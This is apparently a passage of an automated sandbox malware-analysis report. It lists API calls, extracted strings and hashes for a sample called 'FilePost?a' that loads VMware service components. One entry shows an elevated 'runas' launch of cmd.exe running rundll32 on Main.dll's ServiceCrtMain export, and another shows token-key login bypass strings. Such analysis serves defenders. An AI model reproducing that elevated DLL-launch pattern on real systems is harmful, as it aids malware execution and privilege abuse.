                                                    • String ID: GET TOKEN KEY failed: got %s$Login failed: token key authentication not allowed.$Login failed: token key not found.$Login from through tokenkey$Login successful.$attempt to bypass username/password from %.128s
                                                    • API String ID: 2415109466-2849098001
                                                    • Opcode ID: 8683e543c5e410469a4669f62e0a5714eab16cf79986f56a2f8f9a202387f113
                                                    • Instruction ID: f97416e187e1ed259b703637b1df887214b0011471da2b35d4cf72b1e34d93c0
                                                    • Opcode Fuzzy Hash: 8683e543c5e410469a4669f62e0a5714eab16cf79986f56a2f8f9a202387f113
                                                    • Instruction Fuzzy Hash: AA01F575280344AAD710AB58EC0BF5637E5DB80B08F0520B7F9083B3D3D6A69A238623
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: c73daf3badf4d6d322db0b3c955ea9c852e40f857c17da38fa725047dc4cdedd
                                                    • Instruction ID: b830e7545df3fec2b7c8ef4213d18d10b8cac6350abce8427ecd00179f69694d
                                                    • Opcode Fuzzy Hash: c73daf3badf4d6d322db0b3c955ea9c852e40f857c17da38fa725047dc4cdedd
                                                    • Instruction Fuzzy Hash: 6721B576901118EFCB81DFE5D880DDE7BF8FF08644F0041A6E5159B6A1EB32EA49CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNEL32(000007D0), ref: 6CF547C7
                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,?,00000000,00000000), ref: 6CF5492D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShellSleep
                                                    • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                                    • API String ID: 4194306370-3989350086
                                                    • Opcode ID: f7dd1dffc70b612e867f862de81eca9e6a5a1abfedbf62d1c82e6972b2ded789
                                                    • Instruction ID: 824f42deb92531f13672c1cf0fffb32a6b70316086fb9194d4fb7355444b5b91
                                                    • Opcode Fuzzy Hash: f7dd1dffc70b612e867f862de81eca9e6a5a1abfedbf62d1c82e6972b2ded789
                                                    • Instruction Fuzzy Hash: 51D1F570A002489FEB18CF68CC94BEDBBB1FF55304F64425CD115A7B81D774AAA5CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED3710: Warning.VMWAREBASE(?,?,00000001,?,00000000,00ED13A6), ref: 00ED377C
                                                      • Part of subcall function 00ED3710: WSAGetLastError.WS2_32(?,00000000,00ED13A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3787
                                                      • Part of subcall function 00ED3710: WaitForSingleObject.KERNEL32(?,?,?,00000000,00ED13A6), ref: 00ED37A8
                                                      • Part of subcall function 00ED3710: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED38FC
                                                      • Part of subcall function 00ED3710: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED3919
                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00EDA5D8,00EDA5D9), ref: 00ED1DF2
                                                    • Warning.VMWAREBASE(Read failed.), ref: 00ED1EE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printf_strnicmp
                                                    • String ID: Please login with USER and PASS.$Read failed.$Received command: %s$Received command: %s ...$Unknown command '%s'$Waiting for next command.
                                                    • API String ID: 3208188869-2408999901
                                                    • Opcode ID: e1dd6636e2590232a04edabec646b7d728ea32665691a45be987ad413bdd26ae
                                                    • Instruction ID: d71dc862777a243c13e5c2863cd44e972c14c1190df68ef921f906493cf7fb0e
                                                    • Opcode Fuzzy Hash: e1dd6636e2590232a04edabec646b7d728ea32665691a45be987ad413bdd26ae
                                                    • Instruction Fuzzy Hash: DC41F670600215ABDB248B14CC41BE673A9EF44309F1850B7ED49FB386DB719E468792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED7690: EnterCriticalSection.KERNEL32(?,?,?,?,?,00ED3EB2,?,0000003E,?), ref: 00ED76B2
                                                      • Part of subcall function 00ED7690: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00ED3EB2,?,0000003E,?), ref: 00ED76CA
                                                      • Part of subcall function 00ED7690: LeaveCriticalSection.KERNEL32 ref: 00ED76D3
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00ED3ECA
                                                    • GetLastError.KERNEL32 ref: 00ED3EFE
                                                    • GetLastError.KERNEL32 ref: 00ED3F17
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3F1E
                                                    • Sleep.KERNEL32(00001388), ref: 00ED3F38
                                                    Strings
                                                    • WaitForMultipleObjects failed: %s (%d) , xrefs: 00ED3F24
                                                    • Service is stopped while %d child processes are running. Resources will be leaked., xrefs: 00ED3F51
                                                    • Unexpected wait result: %d, err %d, xrefs: 00ED3F06
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalErrorLastSection$EnterLeaveMultipleObjectsSleepWaitWarningmemcpy
                                                    • String ID: Service is stopped while %d child processes are running. Resources will be leaked.$Unexpected wait result: %d, err %d$WaitForMultipleObjects failed: %s (%d)
                                                    • API String ID: 3501445041-2352199725
                                                    • Opcode ID: 54db05b668fed1f01beb3e083c851e5889311e2dda9e6b0ceecbd551e3642757
                                                    • Instruction ID: 79fe71bbd78e50ea50acc6dc530b63c17cc5b234451bf4bf37f720cc61fa0bdf
                                                    • Opcode Fuzzy Hash: 54db05b668fed1f01beb3e083c851e5889311e2dda9e6b0ceecbd551e3642757
                                                    • Instruction Fuzzy Hash: AD213775D00219AFD720AB64AC46AEA73A8DB24700F0411A7BA45F23C1E6708F8686A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00000001,?,00000000,?,00ED81F3,00000000,00000000), ref: 00ED825E
                                                    • Warning.VMWAREBASE(00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED8284
                                                    • Warning.VMWAREBASE(%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED8296
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,00EDDA14,tickets,00EDDA14,00000000,00000000), ref: 00ED829C
                                                    • Warning.VMWAREBASE(00ED81F3), ref: 00ED82A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: %s: Creating ticket directory: %s$TicketGetTicketDir$tickets
                                                    • API String ID: 2642810717-1121398582
                                                    • Opcode ID: 2073a414db2e9b5b52c4f9a118aeec1e11de06a3da79ba4086408fc5d6f7e651
                                                    • Instruction ID: 392c84cd71beb8966c6a92eedeb92a037211f9bb9fd7f673ee7edb198334f231
                                                    • Opcode Fuzzy Hash: 2073a414db2e9b5b52c4f9a118aeec1e11de06a3da79ba4086408fc5d6f7e651
                                                    • Instruction Fuzzy Hash: 56F0F63268531036DA112A98AD02FED739DCB41B64F047427F9487A3E7CAA2544313A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF81951
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF8195C
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A50
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A6D
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81A8A
                                                    • DName::operator+.LIBCMT ref: 6CF81A9F
                                                    • UnDecorator::getSignedDimension.LIBCMT ref: 6CF81AB9
                                                    • DName::operator+.LIBCMT ref: 6CF81B8E
                                                      • Part of subcall function 6CF7D97C: DName::DName.LIBVCRUNTIME ref: 6CF7D9DA
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF81C05
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 3679549980-0
                                                    • Opcode ID: 8971bcc62dfdd881ee0fc54acb01e157dddcb34cf6ea9fbf1e13087b073fbfdf
                                                    • Instruction ID: 2427b2221c429b16ce773f830bbc308300c1c6a530905ec498d112d09cfd2f7e
                                                    • Opcode Fuzzy Hash: 8971bcc62dfdd881ee0fc54acb01e157dddcb34cf6ea9fbf1e13087b073fbfdf
                                                    • Instruction Fuzzy Hash: 6EA1D772D4620A9ADF04DFB4E995AEFB778AF06308F10871AD135B6E90DB34D648C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000008), ref: 00ED5968
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003E00,00000000,00000000,00000000), ref: 00ED59A5
                                                    • GetLastError.KERNEL32 ref: 00ED59AF
                                                    • closesocket.WS2_32(00000000), ref: 00ED59C7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED59CE
                                                    Strings
                                                    • Could not create thread to handle socket connection. (error %d)., xrefs: 00ED59B6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThreadcallocclosesocketfree
                                                    • String ID: Could not create thread to handle socket connection. (error %d).
                                                    • API String ID: 516406090-3747702049
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00ED8AB3
                                                    • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00ED8ABE
                                                    • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00ED8ACA
                                                    • __RTC_Initialize.LIBCMT ref: 00ED8AE2
                                                    • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00ED9280), ref: 00ED8AF7
                                                      • Part of subcall function 00ED91EC: InitializeSListHead.KERNEL32(00EE14A0,00ED8B07), ref: 00ED91F1
                                                    • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002320), ref: 00ED8B15
                                                    • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00ED8B30
                                                    • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED8B3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                    • String ID:
                                                    • API String ID: 1933938900-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6CF7BA3B
                                                    • _UnwindNestedFrames.LIBCMT ref: 6CF7BB8D
                                                    • CallUnexpected.LIBVCRUNTIME ref: 6CF7BBA8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3456342781-393685449
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF51B73
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CF51BBF
                                                    • __Getctype.LIBCPMT ref: 6CF51BD8
                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CF51BF4
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF51C89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                    • String ID: bad locale name
                                                    • API String ID: 1840309910-1405518554
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF7DDE3
                                                    • DName::operator+.LIBCMT ref: 6CF7DE36
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                      • Part of subcall function 6CF7C97B: DName::operator+.LIBCMT ref: 6CF7C99C
                                                    • DName::operator+.LIBCMT ref: 6CF7DE27
                                                    • DName::operator+.LIBCMT ref: 6CF7DE87
                                                    • DName::operator+.LIBCMT ref: 6CF7DE94
                                                    • DName::operator+.LIBCMT ref: 6CF7DEDB
                                                    • DName::operator+.LIBCMT ref: 6CF7DEE8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$shared_ptr
                                                    • String ID:
                                                    • API String ID: 1037112749-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CF74E0A
                                                    • GetLastError.KERNEL32(0000000A), ref: 6CF74E35
                                                    Strings
                                                    • Timer: QueryPerformanceFrequency failed with error , xrefs: 6CF74F3B
                                                    • Timer: QueryPerformanceCounter failed with error , xrefs: 6CF74E50
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CounterErrorLastPerformanceQuery
                                                    • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                    • API String ID: 1297246462-2136607233
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00ED1924
                                                    • strrchr.VCRUNTIME140(?,00000020,received %s command: %s,?,?), ref: 00ED192C
                                                      • Part of subcall function 00ED2360: strchr.VCRUNTIME140(00000000,0000002C,?,?,?,00ED1956,-00000001,00000000,00000000), ref: 00ED2379
                                                      • Part of subcall function 00ED2360: strchr.VCRUNTIME140(-00000001,0000002C,?,00000000,00000000), ref: 00ED2395
                                                      • Part of subcall function 00ED2360: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000002,?,?,00000000,00000000), ref: 00ED23B8
                                                    Strings
                                                    • Command '%s%s' not authorized to access the specific VM socket, xrefs: 00ED19CE
                                                    • Invalid arguments to '%s%s', xrefs: 00ED19F2
                                                    • received %s command: %s, xrefs: 00ED1911
                                                    • Command '%s%s' not authorized for specified VM, xrefs: 00ED1990
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: strchr$Warningatoistrrchr
                                                    • String ID: Command '%s%s' not authorized for specified VM$Command '%s%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$received %s command: %s
                                                    • API String ID: 3585856819-255570853
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF95992: _free.LIBCMT ref: 6CF959B7
                                                    • _free.LIBCMT ref: 6CF95C94
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF95C9F
                                                    • _free.LIBCMT ref: 6CF95CAA
                                                    • _free.LIBCMT ref: 6CF95CFE
                                                    • _free.LIBCMT ref: 6CF95D09
                                                    • _free.LIBCMT ref: 6CF95D14
                                                    • _free.LIBCMT ref: 6CF95D1F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,true,?,vmware-vmx-stats.exe), ref: 00ED2B16
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,yes), ref: 00ED2B29
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00EDB20C), ref: 00ED2B3C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _stricmp$Warning$free
                                                    • String ID: config.ini$true$yes
                                                    • API String ID: 1282723336-1982020446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58537
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58559
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58579
                                                    • std::_Facet_Register.LIBCPMT ref: 6CF585E8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58604
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6CF5864B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                    • String ID:
                                                    • API String ID: 2081738530-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF8251E
                                                    • DName::operator+.LIBCMT ref: 6CF8252A
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                    • DName::operator+=.LIBCMT ref: 6CF825E8
                                                      • Part of subcall function 6CF80DB2: DName::operator+.LIBCMT ref: 6CF80E1D
                                                      • Part of subcall function 6CF80DB2: DName::operator+.LIBCMT ref: 6CF810E7
                                                      • Part of subcall function 6CF7C97B: DName::operator+.LIBCMT ref: 6CF7C99C
                                                    • DName::operator+.LIBCMT ref: 6CF825A5
                                                      • Part of subcall function 6CF7CAA8: DName::operator=.LIBVCRUNTIME ref: 6CF7CAC9
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF8260C
                                                    • DName::operator+.LIBCMT ref: 6CF82618
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                    • String ID:
                                                    • API String ID: 2795783184-0
                                                    • Opcode ID: 21300281eb13e9a7d68462c03e432436b47aef9ead81fcc84945972a7fcee600
                                                    • Instruction ID: 0486528cb971c1a3694d0e804b717400247eabbadd698ee8fde12bc31a6a6403
                                                    • Opcode Fuzzy Hash: 21300281eb13e9a7d68462c03e432436b47aef9ead81fcc84945972a7fcee600
                                                    • Instruction Fuzzy Hash: CD410AB1A422449FDF10DFA8D864BDE7BF5EB0A304F400499E196DB781DB357984C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(00000001,?,6CF7B410,6CF77726,6CF779B7,?,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0,0000000C,6CF77CE8), ref: 6CF7B4AE
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF7B4BC
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF7B4D5
